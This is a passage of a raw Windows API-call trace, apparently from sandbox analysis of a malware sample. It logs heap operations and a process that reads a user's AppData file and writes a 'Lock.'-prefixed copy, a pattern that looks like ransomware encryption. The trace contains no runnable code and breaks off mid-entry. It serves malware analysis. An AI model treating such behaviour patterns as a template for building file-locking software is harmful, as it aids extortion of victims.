0x24a9420 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.385] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.386] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jOF28qdC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jof28qdc.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0200.389] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.389] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0200.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0200.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.390] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0200.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.391] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0200.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0200.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0200.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.jOF28qdC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.jof28qdc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0200.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0200.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0200.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0200.395] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0200.395] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0200.398] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x31aa, lpOverlapped=0x0) returned 1 [0200.398] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0200.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x131aa) returned 0x24d7a58 [0200.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0200.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0200.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x131aa) returned 0x34b2250 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.403] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x131aa) returned 0x24d7a58 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.403] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0200.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0200.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0200.404] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.404] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0200.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0200.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x131aa) returned 0x24d7a58 [0200.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0200.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x131aa) returned 0x34c5408 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.408] RtlAllocateHeap 